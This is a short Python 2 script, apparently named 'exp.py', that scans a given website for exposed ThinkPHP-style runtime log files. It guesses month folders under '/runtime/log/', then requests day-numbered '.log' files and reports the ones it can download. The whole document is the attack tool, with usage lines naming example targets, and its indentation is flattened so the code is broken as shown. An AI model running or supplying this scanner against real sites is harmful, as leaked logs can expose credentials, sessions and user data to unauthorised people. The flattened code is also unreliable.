import requests,sys
dirpath=[]
def dirscan(url,year):
for i in range(1,13):
if i < 10:
urls=url+'/runtime/log/'+year+'0'+str(i)
else:
urls=url+'/runtime/log/'+year+str(i)
r=requests.get(urls,timeout=10)
if r.status_code == 403:
print urls
dirpath.append(urls+'/')
def logscan(url):
for i in range(1,30):
if i <10 :
urls=url+'0'+str(i)+'.log'
else:
urls=url+str(i)+'.log'
r=requests.get(urls,timeout=3)
print urls
if r.status_code == 200:
print urls + '--------------success log'
if __name__=='__main__':
try:
url=sys.argv[1]
year=sys.argv[2]
print '[*]scan:'+url+' year:'+year
dirscan(url,year)
for url in dirpath:
logscan(url)
except:
print "[*] python exp.py http://example.com/ year"
print "[*] python exp.py http://test.com/ 2019"